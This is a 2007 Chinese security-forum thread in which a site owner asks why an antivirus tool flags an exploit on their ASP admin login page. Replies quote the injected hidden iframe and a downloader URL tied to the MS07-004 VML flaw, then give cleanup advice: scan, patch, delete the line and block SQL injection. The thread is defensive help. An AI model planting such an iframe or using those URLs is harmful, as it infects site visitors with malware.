5218898 - 2007-2-13 23:35:00
昨天我求帮忙 这样写的
我在打开我的网站后台管理页面 瑞星网页检控就会警告发现Hack.Exploit.Vml.h病毒,而且输入后台户名 登陆密码 验证码等 打开管理页面是空白的 在打开其他网站任何网页都没事 是不是我的网站空间后台病毒入侵了 请求帮忙 怎么解决 呀
谢谢了 后台管理地址http://www.36518.net.cn/2006/Admin_login.asp 您费心了
好心的人laopang回复
很遗憾的告诉你,你的登陆界面被人植入了一个恶意网址,你可以看一下代码的头部,有一段:
<Iframe src=http://szfile.focus.cn/file/578/xiao.htm width=0 height=0></iframe>
这段代码是利用了MS07-004的vml漏洞的代码,会下载exe的
你赶快检查你的网站或者主机是否存在漏洞
好心的版主超凡脱俗回复
Iframe src=http://szfile.focus.cn/file/578/xiao.htm width=0 height=0></iframe>
下载的.exe
URLMONttp://szfile.focus.cn/file/575/Install.exe
可我在登陆页面察看源文件可看到这个毒代码 我后台是ASP文件里怎么也找不到这个王八代码 求指教它在什么地方 怎样才能清除它 我急呀!谢谢了
反病毒1254 - 2007-2-14 9:30:00
这个..........请到我的网盘下载SRENG,使用“智能扫描”,按下“扫描”按钮进行扫描,
扫描完成后按下“保存报告”按钮保存报告日志文件(SREng.LOG),把保存的报告
日志文件内容复制-粘贴上来,,日志一次粘不完,分次粘完,请不要修改。
长期潜水 - 2007-2-14 10:59:00
简单的说,你的网站被放马了,访问你网站的机器,只要没打MS06-14补丁就会自动下载那个EXE,在本地感染病毒
你需要做的是,检查服务器上可能存在的病毒,修复系统漏洞,清除病毒代码
梦幻黑鹰 - 2007-2-14 12:00:00
请将你服务器的病毒杀完。把补丁打上,再去admin_login.asp文件的第一行<Iframe src=http://szfile.focus.cn/file/578/xiao.htm width=0 height=0></iframe> 删除。
附件:
8445002007214115041.jpg
网络骑士HKC - 2007-2-14 16:23:00
估计是用SQL注入进去再挂马的
恢复完了以后记得去弄个SQL防注挂上去
© 2000 - 2026 Rising Corp. Ltd.